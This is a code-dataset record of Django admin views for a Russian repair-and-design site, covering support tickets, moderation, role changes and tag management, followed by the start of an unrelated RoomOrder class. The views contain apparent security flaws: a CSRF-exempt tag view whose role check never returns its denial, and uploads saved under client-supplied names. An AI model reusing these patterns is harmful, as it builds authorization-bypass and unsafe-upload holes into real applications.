str(request.user.id) +')], [user_complaint «'+ user_complaint.username +'» (id: '+ str(user_complaint.id) +')]',\n )\n\n # если обращение поступило вместе с фотками\n if request.FILES and int(complaint['complaint_type']) in [11, 12]:\n fs = FileSystemStorage()\n for one_photo in request.FILES:\n # print(photo)\n fs.save(('contacting_support_media/' + one_photo), request.FILES[one_photo])\n ContactingSupportPhotos.objects.create(contacting_support_action=contacting_support, photo=('contacting_support_media/' + one_photo))\n\n if int(complaint['complaint_type']) in [11, 12]:\n return JsonResponse({'result': True})\n\n\n# стартовая страница админа\nclass StartPanel(ListView):\n model = Publication\n template_name = 'adminapp/main.html'\n\n def get(self, *args, **kwargs):\n if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n else:\n resp = super().get(*args, **kwargs)\n return resp\n\n def get_context_data(self, **kwargs):\n title ='Главная | Панель администратора'\n pubs = Publication.objects.filter(type__id__in=[11, 21, 31]).order_by('-pushed')[:3]\n users = User.objects.filter().order_by('-last_entry')[:4]\n tag_categories = TagCategory.objects.all().order_by('id')[:4]\n tags = [Tag.objects.annotate(text_len=Length('name')).filter(text_len__lte=20, category=category)[:4] for category in tag_categories]\n new_letters_to_support = ContactingSupport.objects.filter(answer_content=None).order_by('-when_asked')[:5]\n answered_letters_to_support = ContactingSupport.objects.exclude(answer_content=None).order_by('-when_asked')[:3] if not new_letters_to_support else None\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n data = {\n 'title': title,\n 'pubs': pubs,\n 'users': users,\n 'new_letters_to_support': new_letters_to_support,\n 'answered_letters_to_support': answered_letters_to_support,\n 'new_letters_to_support_count': new_letters_to_support_count,\n \t\t'tags': tags,\n \t\t'tag_categories': tag_categories,\n }\n return data\n\n\n# все обращения в поддержку:\n# их вывод и обработка администраторами\ndef LettersToSupport(request):\n if not request.user.is_authenticated:\n return HttpResponse(\"Сначала авторизируйтесь! Авторизоваться\")\n if not request.user.role.id in [3, 4]:\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n answer_form = AnswerForm()\n answer_to_report_form = AnswerToReportForm()\n\n if request.method == 'POST' and ContactingSupport.objects.filter(id=int(request.POST['ask_id'])).count() >0:\n if not request.POST['answer'].isspace():\n answer = request.POST\n letter = ContactingSupport.objects.get(id=int(answer['ask_id']))\n if letter.type.id == 0 and 'delete_letter' in answer:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010500),\n content = 'Спасибо Вам за Ваше обращение! С Ваши обращением «' + letter.title + '», отправленным ' + str(localize(letter.when_asked)) + ', на каком-то этапе обработки что-то пошло не так... Оно было удалено. Если вопрос остаётся открытым, пожалуйста, сделайте обращение в поддержку ешё раз. Также: если что, на обращение был сделан ответ: «' + answer['answer'] + '». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = \"Просим прощения за неудобства ❤\"\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010500),\n action_person = request.user,\n action_content = 'Сломанное обращение «'+ letter.title +'» от пользователя «'+ letter.asked_by.username +'» отвечено и удалено пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if not letter.answer_content:\n letter.answer_content = answer['answer']\n letter.answered_by = request.user\n letter.when_answered = timezone.now()\n letter.delete()\n\n if not letter.answer_content:\n letter_type = letter.type.id\n action_type = 1012201 if letter_type == 11 else 1011201\n\n if letter_type in [11, 12, 21, 22, 31, 32]:\n letter.answer_content = answer['answer']\n letter.answered_by = request.user\n letter.when_answered = timezone.now()\n\n if letter_type in [11, 12]:\n letter.answer_additional_info = 0\n pub = user = None\n if letter_type == 11:\n pub = Publication.objects.get(id = letter.ask_additional_info) if Publication.objects.filter(id = letter.ask_additional_info) else None\n # noti_preview = pub.get_preview if pub else 'users_avatars/404_something_went_wrong.png'\n report_reason_receiver = pub.author if pub else None\n if letter_type == 12:\n user = User.objects.get(id = letter.ask_additional_info) if User.objects.filter(id = letter.ask_additional_info) else None\n # noti_preview = user.photo.name if user else 'users_avatars/404_something_went_wrong.png'\n report_reason_receiver = user if user else None\n\n nothing_but_just_answer = not 'is_delete_pub' in answer and not 'is_deny_rules' in answer and not 'is_delete_account' in answer\n thats_pub_report_and_pub_author_role_id_is_4 = letter_type == 11 and pub.author.role.id == 4 if pub else None\n thats_account_report_and_account_role_id_is_4 = letter_type == 12 and user.role.id == 4 if user else None\n if (\n (nothing_but_just_answer)\n or (thats_pub_report_and_pub_author_role_id_is_4)\n or (thats_account_report_and_account_role_id_is_4)\n ):\n # print('ответ только сообщением')\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Спасибо Вам за Вашу бдительность и Вашу жалобу! ' + letter.title + ', отправленная Вами ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – закрыть вопрос только текстовым ответом: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу ещё раз, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»!',\n hover_text = 'Если решение не устраивает, можно подать жалобу ещё раз ❤'\n ).receiver.add(letter.asked_by)\n\n if report_reason_receiver:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = letter.title + ', отправленная пользователем «' + letter.asked_by.username + '» ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – закрыть вопрос только текстовым ответом: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»!',\n hover_text = 'Если решение не устраивает, можно подать жалобу ❤'\n ).receiver.add(report_reason_receiver)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n else:\n # print('ответ не только сообщением')\n decision = ''\n decision_for_report_reason_receiver = ''\n if letter_type == 11 and 'is_delete_pub' in answer:\n # print('+ удалить публикацию')\n pub_name = '«' + pub.title + '»' if pub else '[удалена]'\n decision = 'безвозвратно удалить публикацию ' + pub_name\n if pub:\n pub.delete()\n letter.answer_additional_info += 10\n else:\n letter.answer_additional_info += 40\n decision += ' (но она уже была удалена по какой-то причине)'\n\n if decision:\n decision += ' и '\n if report_reason_receiver:\n decision_for_report_reason_receiver = decision\n\n if 'is_deny_rules' in answer and not 'is_delete_account' in answer:\n # print('+ лишить роли')\n report_reason_receiver_name = '«' + report_reason_receiver.username + '» ' if report_reason_receiver else '[удалён] '\n decision += 'понизить пользователя ' + report_reason_receiver_name + 'до роли \"Пользователь-зритель\"'\n if report_reason_receiver:\n decision_for_report_reason_receiver += 'понизить Вас до роли \"Пользователь-зритель\"'\n report_reason_receiver.role = UserRoles.objects.get(id=1)\n report_reason_receiver.save()\n letter.answer_additional_info += 100\n else:\n letter.answer_additional_info += 400\n\n if 'is_delete_account' in answer:\n # print('+ удалить аккаунт')\n report_reason_receiver_name = '«' + report_reason_receiver.username + '»' if report_reason_receiver else '[удалён] '\n decision += 'безвозвратно удалить пользователя ' + report_reason_receiver_name\n if report_reason_receiver:\n report_reason_receiver.delete()\n letter.answer_additional_info += 1000\n else:\n letter.answer_additional_info += 4000\n\n if not report_reason_receiver:\n decision += ' (но этот пользователь по каким-то причинам уже удалён, никаких манипуляций над ним уже не произвести)'\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Спасибо Вам за Вашу бдительность и Вашу жалобу! ' + letter.title + ', отправленная Вами ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – ' + decision + '. Также ответ от поддержки: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу ещё раз, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Если решение не устраивает, можно подать жалобу ещё раз ❤'\n ).receiver.add(letter.asked_by)\n\n if not 'is_delete_account' in answer and report_reason_receiver:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = letter.title + ', отправленная пользователем «' + letter.asked_by.username + '» ' + str(localize(letter.when_asked)) + ', была рассмотрена. Решение поддержки – ' + decision_for_report_reason_receiver + '. Также ответ от поддержки: «' + answer['answer'] + '». Если решение не устраивает и/или не решает вопроса, подайте жалобу, упомянув об этом. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Если решение не устраивает, можно подать жалобу ❤'\n ).receiver.add(report_reason_receiver)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if letter_type in [21, 22]:\n letter.ask_additional_info = 999\n if letter_type == 21:\n role_name = 'роль автора публикаций'\n action_type = 1013201\n role_id = 2\n if letter_type == 22:\n role_name = 'роль админа'\n action_type = 1014201\n role_id = 3\n\n if letter.asked_by.role.id == 4 and User.objects.filter(role=UserRoles.objects.get(id=4)).count() <= 1:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Ваша заявка на '+ role_name +' была рассмотрена. На данный момент в системе всего 1 суперпользователь, поэтому нам опасно менять Вам роль. Найдите наследника и обращайтесь ещё! Также ответ от поддержки: «' + answer['answer'] +'». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'По-другому пока не можем. Просим простить нас ❤'\n ).receiver.add(letter.asked_by)\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Заявка на '+ role_name +' от пользователя «' + letter.asked_by.username + '» никак не может быть одобрена: на данный момент в системе всего 1 суперпользователь, поэтому опасно менять ему роль. Придётся подождать наследника и обратиться потом ещё. С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'По-другому мы пока не можем. Вот так вот ❤'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = 'Заявка на '+ role_name +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') не обработана – всего 1 суперпользователь в системе.',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n else:\n if answer['change_role'] == 'Назначить новую роль':\n decision = 'поздравляем! Теперь у Вас '+ role_name +'!'\n letter.answer_additional_info = 1\n letter_author = letter.asked_by\n letter_author.role = UserRoles.objects.get(id=role_id)\n letter_author.save()\n else:\n decision = 'к сожалению, '+ role_name +' Вам не назначена.'\n letter.answer_additional_info = 0\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Ваша заявка на '+ role_name +' была рассмотрена. Решение: '+ decision +' Также ответ от поддержки: «' + answer['answer'] +'». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Пишите ещё, если что-то непонятно, или у Вас родилась идея! ❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = 'Заявка на '+ role_name +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n if letter_type in [31, 32]:\n if letter_type == 31:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n content = 'Ваш вопрос был рассмотрен. Ответ от поддержки: «' + answer['answer'] + '».',\n hover_text = 'Пишите ещё, если что-то непонятно, или у Вас родилась идея! ❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подан '+ str(localize(letter.when_asked)) +') обработан пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n if letter_type == 32:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n content = 'Спасибо Вам за Вашу идею! Идея была рассмотрена. Ответ от поддержки: «' + answer['answer'] + '». С заботой, Ваша поддержка «Ремонта и Дизайна»',\n hover_text = 'Ждём ещё идей! ❤'\n ).receiver.add(letter.asked_by)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=1010201),\n action_person = request.user,\n action_content = letter.title +' от пользователя «'+ letter.asked_by.username +'» (подана '+ str(localize(letter.when_asked)) +') обработана пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n letter.save()\n else:\n answer_form = AnswerForm({'answer': None})\n answer_to_report_form = AnswerToReportForm({'answer': None, 'decision': 'just_answer'})\n\n\n ideas = ContactingSupport.objects.filter(type=32).exclude(answer_content=None)\n new_ideas = ContactingSupport.objects.filter(type=32, answer_content=None)\n new_ideas_count = new_ideas.count()\n all_ideas_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=32)\n\n questions = ContactingSupport.objects.filter(type=31).exclude(answer_content=None)\n new_questions = ContactingSupport.objects.filter(type=31, answer_content=None)\n new_questions_count = new_questions.count()\n all_questions_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=31)\n\n applications = ContactingSupport.objects.filter(type__in=[21, 22]).exclude(answer_content=None)\n new_applications = ContactingSupport.objects.filter(type__in=[21, 22], answer_content=None)\n new_applications_count = new_applications.count()\n all_applications_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type__in=[21, 22])\n\n reports = ContactingSupport.objects.filter(type__in=[11, 12]).exclude(answer_content=None)\n new_reports = ContactingSupport.objects.filter(type__in=[11, 12], answer_content=None)\n new_reports_count = new_reports.count()\n all_reports_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type__in=[11, 12])\n reported_pubs_list_id = [p.ask_additional_info for p in ContactingSupport.objects.filter(type=11)]\n reported_users_list_id = [u.ask_additional_info for u in ContactingSupport.objects.filter(type=12)]\n reported_pubs = Publication.objects.filter(id__in=reported_pubs_list_id)\n reported_users = User.objects.filter(id__in=reported_users_list_id)\n deleted_pubs_in_reports_ids = [id for id in reported_pubs_list_id if not Publication.objects.filter(id=id)]\n deleted_users_in_reports_ids = [id for id in reported_users_list_id if not User.objects.filter(id=id)]\n\n strange_letters = ContactingSupport.objects.filter(type=0).exclude(answer_content=None)\n new_strange_letters = ContactingSupport.objects.filter(type=0, answer_content=None)\n new_strange_letters_count = new_strange_letters.count()\n all_strange_letters_photos = ContactingSupportPhotos.objects.filter(contacting_support_action__type=0)\n\n title = 'Обращения в поддержку'\n if new_ideas or new_questions or new_applications or new_reports or new_strange_letters:\n title = str(new_ideas_count + new_questions_count + new_applications_count + new_reports_count + new_strange_letters_count) + ' обращений ждут ответа | Обращения в поддержку'\n content = {\n 'answer_form': answer_form,\n 'answer_to_report_form': answer_to_report_form,\n\n 'ideas': ideas,\n 'new_ideas': new_ideas,\n 'new_ideas_count': new_ideas_count,\n 'all_ideas_photos': all_ideas_photos,\n\n 'questions': questions,\n 'new_questions': new_questions,\n 'new_questions_count': new_questions_count,\n 'all_questions_photos': all_questions_photos,\n\n 'applications': applications,\n 'new_applications': new_applications,\n 'new_applications_count': new_applications_count,\n 'all_applications_photos': all_applications_photos,\n\n 'reports': reports,\n 'new_reports': new_reports,\n 'new_reports_count': new_reports_count,\n 'all_reports_photos': all_reports_photos,\n 'reported_pubs': reported_pubs,\n 'reported_users': reported_users,\n 'deleted_pubs_in_reports_ids': deleted_pubs_in_reports_ids,\n 'deleted_users_in_reports_ids': deleted_users_in_reports_ids,\n\n 'strange_letters': strange_letters,\n 'new_strange_letters': new_strange_letters,\n 'new_strange_letters_count': new_strange_letters_count,\n 'all_strange_letters_photos': all_strange_letters_photos,\n\n 'all_new_letters_count': ContactingSupport.objects.filter(answer_content=None).count(),\n 'all_letters_count': ContactingSupport.objects.filter().count(),\n 'title': title,\n }\n return render(request, 'adminapp/letters_to_support.html', content)\n\n\n# удалить обращение в поддержку, если оно отвеченно\ndef DeleteLetterToSupport(request, pk):\n if not request.user.is_authenticated:\n return HttpResponse(\"Сначала авторизируйтесь! Авторизоваться\")\n if request.user.role.id != 4:\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n if ContactingSupport.objects.filter(id=pk):\n letter = ContactingSupport.objects.get(id=pk)\n asked_by_username = ' пользователем «'+ letter.asked_by.username +'»' if letter.asked_by else ''\n asked_by_username2 = ' от пользователя «'+ letter.asked_by.username +'»' if letter.asked_by else ''\n\n if letter.answer_content:\n photos = ContactingSupportPhotos.objects.filter(contacting_support_action=letter)\n if photos:\n fs = FileSystemStorage()\n for photo in photos:\n if fs.exists('../media/'+ photo.photo.name):\n fs.delete('../media/'+ photo.photo.name)\n\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=9920500),\n content = 'Успешно удалено обращение «' + letter.title + '», отправленное ' + str(localize(letter.when_asked)) + asked_by_username,\n hover_text = \"Освобождать память сервера -- это круто! Молодцы)\"\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=9920500),\n action_person = request.user,\n action_content = 'Удалено обращение в поддержку «'+ letter.title +'»'+ asked_by_username2 +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n letter.delete()\n else:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=9920501),\n content = 'Не может быть удалено обращение «' + letter.title + '», отправленное ' + str(localize(letter.when_asked)) + asked_by_username +', поскольку оно ещё не было овечено.',\n hover_text = \"Освобождать память сервера -- это круто! Молодцы) Но на обращения нужно сперва отвечать!\"\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=9920501),\n action_person = request.user,\n action_content = 'Попытка удаления неотвеченного обращения в поддержку «'+ letter.title +'»'+ asked_by_username2 +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [letter_to_support «'+ letter.title +'» (id: '+ str(letter.id) +')]',\n )\n\n return redirect('admin_mine:letters_to_support')\n\n\n# страница всех публикаций в ИС\nclass PubList(ListView):\n model = Publication\n template_name = 'adminapp/publications.html'\n\n def get(self, *args, **kwargs):\n if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n else:\n resp = super().get(*args, **kwargs)\n return resp\n\n def get_context_data(self, *, object_list=None, **kwargs):\n title ='Публикации | Панель администратора'\n pubs = Publication.objects.filter(type__id__in=[11, 21, 31])\n saved_urls = SavedPubs.objects.filter(pub__in = pubs)\n seen_urls = SeenPubs.objects.filter(pub__in = pubs)\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n print(seen_urls)\n for su in seen_urls:\n print(su.pub)\n print(su.watcher)\n print(su.watcher.id)\n print(su.count)\n\n data = {\n 'title': title,\n 'pubs': pubs,\n 'saved_urls': saved_urls,\n 'seen_urls': seen_urls,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return data\n\n\n# страница всех пользователей в ИС\nclass UserList(ListView):\n model = User\n template_name = 'adminapp/users.html'\n\n def get(self, *args, **kwargs):\n if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n else:\n resp = super().get(*args, **kwargs)\n return resp\n\n def get_context_data(self, *, object_list=None, **kwargs):\n title ='Пользователи | Панель администратора'\n users = User.objects.filter().order_by('-last_entry')\n saved_urls = SavedPubs.objects.filter()\n seen_urls = SeenPubs.objects.filter()\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n data = {\n 'title': title,\n 'users': users,\n 'saved_urls': saved_urls,\n 'seen_urls': seen_urls,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return data\n\n\n# страница статистики отдельного пользователя в ИС (как просили на предзащите)\ndef UserIndividual(request, pk):\n if not request.user.is_authenticated:\n return redirect('main')\n if request.user.role.id not in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n opened_user = User.objects.get(id=pk)\n title ='Пользователь «'+ opened_user.username +'» | Панель администратора'\n saved_urls = SavedPubs.objects.filter(saver=opened_user)\n seen_urls = SeenPubs.objects.filter(watcher=opened_user)\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=4010200),\n action_person = request.user,\n action_content = 'Просмотрена страница пользователя «'+ opened_user.username +'» пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [opened_user «'+ opened_user.username +'». (id: '+ str(opened_user.id) +')]'\n )\n\n context = {\n 'title': title,\n 'opened_user': opened_user,\n 'saved_urls': saved_urls,\n 'seen_urls': seen_urls,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return render(request, 'adminapp/user_individual.html', context)\n\n\n# страница журнала всех событий в ИС\nclass JournalList(ListView):\n model = JournalActions\n template_name = 'adminapp/journal.html'\n\n def get(self, *args, **kwargs):\n if not self.request.user.is_authenticated or not self.request.user.role.id in [3, 4]:\n print('проникновение туда, куда нельзя')\n return HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n else:\n resp = super().get(*args, **kwargs)\n return resp\n\n def get_context_data(self, *, object_list=None, **kwargs):\n title ='Журнал всех событий в ИС | Панель администратора'\n journal = JournalActions.objects.filter().order_by('-when')\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n data = {\n 'title': title,\n 'journal': journal,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return data\n\n\n# отображение, создание,\n# редактирование и удаление тегов и их категорий\n@csrf_exempt\ndef TagsAndTagCategories(request):\n if not request.user.is_authenticated:\n return HttpResponse(\"Сначала авторизируйтесь! Авторизоваться\")\n if not request.user.role.id in [4]:\n HttpResponse(\"Простите, но у Вас недостаточно прав для этой страницы. На главную\")\n\n errors = ''\n if request.method == 'POST':\n object = None\n method_POST = request.POST\n\n if (\n 'to_create_or_edit' in method_POST and 'tag_or_category_to_create_or_edit' in method_POST and 'category_or_tag_name' in method_POST\n and method_POST['to_create_or_edit'] and method_POST['tag_or_category_to_create_or_edit'] and method_POST['category_or_tag_name']\n ):\n\n if method_POST['tag_or_category_to_create_or_edit'] == 'category':\n selected_pub_types = [method_POST[item] for item in method_POST.keys() if 'pub_type_' in item]\n\n if method_POST['to_create_or_edit'] == 'create':\n action_type = 2010200\n if not TagCategory.objects.filter(name=method_POST['category_or_tag_name']) and selected_pub_types:\n object = TagCategory.objects.create(name=method_POST['category_or_tag_name'])\n object.pub_type.set(PubTypes.objects.filter(id__in=selected_pub_types))\n object_type = 'создана категория «'+ object.name +'»'\n else:\n message = 'Для создания категории не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if method_POST['to_create_or_edit'] == 'edit':\n action_type = 2010201\n if 'object_id' in method_POST and method_POST['object_id'] and selected_pub_types and TagCategory.objects.filter(id=method_POST['object_id']):\n object = TagCategory.objects.get(id=method_POST['object_id'])\n if object.name != method_POST['category_or_tag_name']:\n object.name = method_POST['category_or_tag_name']\n object.pub_type.set(PubTypes.objects.filter(id__in=selected_pub_types))\n object.save()\n object_type = 'изменена категория «'+ object.name +'»'\n else:\n message = 'Для редактирования категории не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if method_POST['tag_or_category_to_create_or_edit'] == 'tag':\n\n if method_POST['to_create_or_edit'] == 'create':\n action_type = 2011200\n if 'category' in method_POST and method_POST['category'] and not Tag.objects.filter(name=method_POST['category_or_tag_name'], category=method_POST['category']):\n object = Tag.objects.create(\n name=method_POST['category_or_tag_name'],\n category=TagCategory.objects.get(id=method_POST['category'])\n )\n object.save()\n object_type = 'создан тег «'+ object.name +'»'\n else:\n message = 'Для создания тега не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if method_POST['to_create_or_edit'] == 'edit':\n action_type = 2011201\n if 'object_id' in method_POST and method_POST['object_id'] and 'category' in method_POST and selected_pub_types and method_POST['category'] and Tag.objects.filter(id=method_POST['object_id']):\n object = Tag.objects.get(id=method_POST['object_id'])\n if object.name != method_POST['category_or_tag_name'] or object.category.id != int(method_POST['category']) or set(object.pub_type.all()) != set(PubTypes.objects.filter(id__in=selected_pub_types)):\n object.name = method_POST['category_or_tag_name']\n object.category = TagCategory.objects.get(id=method_POST['category'])\n object.save()\n object_type = 'изменён тег «'+ object.name +'»'\n else:\n message = 'Для редактирования тега не всё заполнено!'\n errors += message if not errors else '
' + message\n\n if object:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Успешно '+ object_type +'!',\n hover_text = 'Наверное умничкааа) А других уведомить и желательно ещё причину и возможности указать? А?',\n url = reverse('admin_mine:tags_and_tag_categories'),\n url_text = 'Теги и их категории'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = object_type.capitalize() +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [tag_or_tag_category «'+ str(object) +'» (id: '+ str(object.id) +')]',\n )\n\n if 'tag_or_category_to_delete' in method_POST and 'object_id' in method_POST and method_POST['tag_or_category_to_delete'] and method_POST['object_id']:\n if method_POST['tag_or_category_to_delete'] == 'category':\n action_type = 2010999\n object = TagCategory.objects.filter(id=method_POST['object_id'])\n if object:\n object = TagCategory.objects.get(id=method_POST['object_id'])\n object_type = 'удалена категория «'+ object.name +'»'\n\n if method_POST['tag_or_category_to_delete'] == 'tag':\n action_type = 2011999\n object = Tag.objects.filter(id=method_POST['object_id'])\n if object:\n object = Tag.objects.get(id=method_POST['object_id'])\n object_type = 'удалён тег «'+ object.name +'»'\n\n if object:\n Notifications.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n content = 'Успешно '+ object_type +'!',\n hover_text = 'Ну и зачем? А других уведомить и желательно ещё причину указать? А?',\n url = reverse('admin_mine:tags_and_tag_categories'),\n url_text = 'Теги и их категории'\n ).receiver.add(request.user)\n\n JournalActions.objects.create(\n type = ActionTypes.objects.get(id=action_type),\n action_person = request.user,\n action_content = object_type.capitalize() +' пользователем «'+ request.user.username +'».',\n action_subjects_list = '[user «'+ request.user.username +'». (id: '+ str(request.user.id) +')], [tag_or_tag_category «'+ str(object) +'» (id: '+ str(object.id) +')]',\n )\n\n object.delete()\n\n title = 'Теги публикаций и их категории'\n tags = Tag.objects.all()\n tag_categories = TagCategory.objects.all()\n pubs = Publication.objects.filter(type__in=[11, 21, 31])\n pub_types = PubTypes.objects.filter(id__in=[11, 21, 31])\n new_letters_to_support_count = ContactingSupport.objects.filter(answer_content=None).count()\n\n content = {\n 'title': title,\n 'tags': tags,\n 'tag_categories': tag_categories,\n 'pubs': pubs,\n 'pub_types': pub_types,\n 'errors': errors,\n 'new_letters_to_support_count': new_letters_to_support_count,\n }\n return render(request, 'adminapp/tags_and_tag_categories.html', content)\n","repo_name":"todrgor/repair_design_fields_DJANGO","sub_path":"adminapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":51402,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17717696355","text":"from response import Response\nfrom preodb import PreoDB\n\nclass RoomOrder:\n def __init__(self, db_path=PreoDB.DEFAULT_DB_PATH):\n self.preo_db = PreoDB(db_path)\n\n def new_order(self, room_id, list_name):\n if self.preo_db.is_room_order_exist(room_id):\n # Room order has already been created.\n return Response.text(Response.REP_DUP_ORDERLIST)\n\n self.preo_db.new_room_order(room_id, list_name)\n return Response.text(Response.REP_NEW_ORDERLIST_CREATED, list_name)\n\n def set_item(self, room_id, user_name, item_name, amount):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if not self.preo_db.is_room_order_enable(room_id):\n # Room order is not enabled.\n print(\"Error: room order %s is not enabled\" % (room_id))\n return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n\n self.preo_db.set_order(room_id, user_name, item_name, amount)\n return Response.text(Response.REP_SET_ITEM, user_name, item_name, amount)\n\n def delete_item(self, room_id, user_name, item_name):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n 